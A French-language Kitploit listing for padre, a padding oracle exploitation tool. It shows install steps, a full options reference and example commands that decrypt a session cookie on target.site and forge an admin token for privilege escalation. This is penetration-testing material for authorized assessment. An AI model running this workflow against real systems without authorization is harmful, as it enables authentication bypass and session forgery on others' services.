Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
padre — Exploit de Padding Oracle ultra-rapide et avancé | Kitploit
Outils/GitHubGitHub/glebarez/padre
ExploitationSécurité WebCryptographieTests d'Intrusion
GitHubglebarez/padre

padre

Exploit de Padding Oracle ultra-rapide et avancé

Voir le dépôt
280287il y a 1 anVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Publish release

padre

padre est un exploiteur avancé pour les attaques par Oracle de Padding contre le chiffrement en mode CBC

Fonctionnalités :

  • implémentation ultra-rapide et concurrente
  • déchiffrement de jetons
  • chiffrement de données arbitraires
  • empreinte automatique des oracles de padding
  • détection automatique de la longueur du bloc de chiffrement
  • INDICES ! en cas d'échec lors des opérations, padre vous indiquera ce qui peut être ajusté pour réussir
  • prend en charge les jetons dans les paramètres GET/POST, les cookies
  • spécification flexible des règles d'encodage (base64, hex, etc.)

Démo

demo

Installation/Mise à jour

  • Le moyen le plus rapide est de télécharger le binaire pré-compilé pour votre système d'exploitation depuis la dernière version

  • Sinon, si vous avez Go installé, compilez à partir des sources :

root@kitploit:~
go install github.com/glebarez/padre@latest
Télécharger l’outil

Scénario d'utilisation

Si vous trouvez un oracle de padding suspect, où les données chiffrées sont stockées dans un cookie nommé SESS, vous pouvez utiliser la commande suivante :

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' 'Gw3kg8e3ej4ai9wffn%2Fd0uRqKzyaPfM2UFq%2F8dWmoW4wnyKZhx07Bg=='

padre effectuera automatiquement l'empreinte des réponses HTTP pour déterminer si l'oracle de padding peut être confirmé. Si le serveur est effectivement vulnérable, le jeton fourni sera déchiffré en quelque chose comme :

root@kitploit:~
 {"user_id": 456, "is_admin": false}

Il semble que vous puissiez élever vos privilèges ici !

Vous pouvez tenter de le faire en générant d'abord vos propres données chiffrées que l'oracle déchiffrera en un texte clair malicieux :

root@kitploit:~
padre -u 'https://target.site/profile.php' -cookie 'SESS=$' -enc '{"user_id": 456, "is_admin": true}'

Cela produira un autre ensemble encodé de données chiffrées, peut-être quelque chose comme ci-dessous (si base64 est utilisé) :

root@kitploit:~
dGhpcyBpcyBqdXN0IGFuIGV4YW1wbGU=

Maintenant, vous pouvez ouvrir votre navigateur et définir la valeur du cookie SESS sur la valeur ci-dessus. En rechargeant la page oracle d'origine, vous devriez voir que vous êtes élevé au niveau administrateur.

Impact des oracles de padding

  • divulgation d'informations de session chiffrées
  • contournement de l'authentification
  • fourniture de faux jetons que le serveur considérera comme valides
  • extension large de la surface d'attaque en général

Options d'utilisation complètes

root@kitploit:~
Usage: padre [OPTIONS] [INPUT]

INPUT: 
	In decrypt mode: encrypted data
	In encrypt mode: the plaintext to be encrypted
	If not passed, will read from STDIN

	NOTE: binary data is always encoded in HTTP. Tweak encoding rules if needed (see options: -e, -r)

OPTIONS:

-u *required*
	target URL, use $ character to define token placeholder (if present in URL)

-enc
	Encrypt mode

-err
	Regex pattern, HTTP response bodies will be matched against this to detect padding oracle. Omit to perform automatic fingerprinting

-e
	Encoding to apply to binary data. Supported values:
		b64 (standard base64) *default*
		lhex (lowercase hex)

-r
	Additional replacements to apply after encoding binary data. Use odd-length strings, consiting of pairs of characters <OLD><NEW>.
	Example:
		If server uses base64, but replaces '/' with '!', '+' with '-', '=' with '~', then use -r "/!+-=~"

-cookie
	Cookie value to be set in HTTP requests. Use $ character to mark token placeholder.

-post
	String data to perform POST requests. Use $ character to mark token placeholder. 

-ct
	Content-Type for POST requests. If not specified, Content-Type will be determined automatically.
	
-b
	Block length used in cipher (use 16 for AES). Omit to perform automatic detection. Supported values:
		8
		16 *default*
		32

-p
	Number of parallel HTTP connections established to target server [1-256]
		30 *default*
		
-proxy
	HTTP proxy. e.g. use -proxy "http://localhost:8080" for Burp or ZAP

Lectures complémentaires

  • https://blog.skullsecurity.org/2013/a-padding-oracle-example
  • https://blog.skullsecurity.org/2016/going-the-other-way-with-padding-oracles-encrypting-arbitrary-data

Outils alternatifs

  • https://github.com/liamg/pax
  • https://github.com/AonCyberLabs/PadBuster